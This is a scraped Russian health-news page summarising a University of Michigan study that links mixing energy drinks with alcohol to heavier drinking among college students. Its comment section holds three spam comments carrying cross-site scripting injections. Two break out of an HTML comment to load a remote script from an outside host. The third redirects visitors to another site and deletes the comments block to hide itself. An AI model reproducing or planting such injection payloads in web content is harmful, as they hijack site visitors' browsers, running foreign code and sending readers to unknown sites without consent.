Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Энергетические напитки с ...  >>  Энергетические напитки с алкоголем: хорошо или нет?
 
Обратная связь
 

Энергетические напитки с алкоголем: хорошо или нет?

Размер шрифта
25 декабря 2014 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

Ученые выяснили, что энергетические напитки вовсе не так безобидны, как может показаться на первый взгляд. Оказывается, смешивать энергетики с алкоголем – дело очень рискованное.

Энергетические напитки с алкоголем: нормально или нет?

Работу возглавила Меган Патрик из отдела социальных исследований Университета Мичигана, а ее результаты были опубликованы в Journal of Adolescent Health. «Мы обнаружили, что студенты колледжа пили больше и пьянели сильнее в те дни, когда они помимо алкоголя употребляли и еще и энергетические напитки», – рассказывает Патрик.

На данный момент в Америке производителям запрещено выпускать коктейли, в которых кроме алкоголя содержится высокая доза кофеина. Однако смешанные напитки, такие как водка с Ред Буллом и так называемые Егер-бомбы (напиток, который получается, когда в стакан Ред Булла добавляют рюмку ликера Егермейстер), становятся все более популярны, особенно среди молодежи. Риск от чрезмерного употребления алкоголя сводится не только к серьезным последствиям вроде нарушений сознания и отравления алкоголем. Для общества в целом опасно и то, что наутро после шумной вечеринки молодые люди могут все еще быть пьяны, и в таком состоянии, к примеру, садиться за руль.

Ученые собрали и проанализировали данные о 652 студентах колледжа за четыре учебных семестра. Студенты отвечали на вопросы о том, сколько энергетиков и алкогольных напитков они выпили и должны были сообщать исследователям обо всех негативных последствиях – начиная от похмелья и заканчивая серьезными неприятностями, в которые они попадали в связи с опьянением. «Наши данные говорят о том, что смешивание энергетических напитков и алкоголя приводит к более сильному опьянению и более серьезным проблемам в дальнейшем», – резюмирует Патрик. «А сейчас популярность энергетиков стремительно растет. Так что мы должны подумать о том, как предотвратить все те неприятные последствия, которые вызваны их употреблением».

Так что постарайтесь не злоупотреблять энергетическими коктейлями, а уж тем более не стоит мешать их со спиртным.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 18:27

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 21:25

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

3 - zzzzzz

30 июня 2015 в 22:22

Цитировать   |   Пожаловаться

-->> window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Достаточно один раз напиться, чтобы желудок разорвался   Что пьяному хорошо, трезвому – смерть! Оказывается, алкоголь защищает от травм!   Как отметить без похмелья   Чья печень в опасности: алкотипы. Часть 5  
11 апреля 2013Каждая 30-я смерть от рака из-за водки 04 декабря 2012Ресвератрол не обладает полезным действием
 
27 июля 2011В Москве за полгода от запоев погибли более 1000 человек 21 января 2011С помощью кофе не удастся протрезветь
 

Слайдшоу

1
Алкогольные напитки, которые заставят вас потолстеть!
Как студенческая жизнь влияет на здоровье
Как похудеть, ничего не делая

Тесты

1
Кофеин вызывает зависимость?
Будет ли у вас инфаркт?
Как устроены волосы человека?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.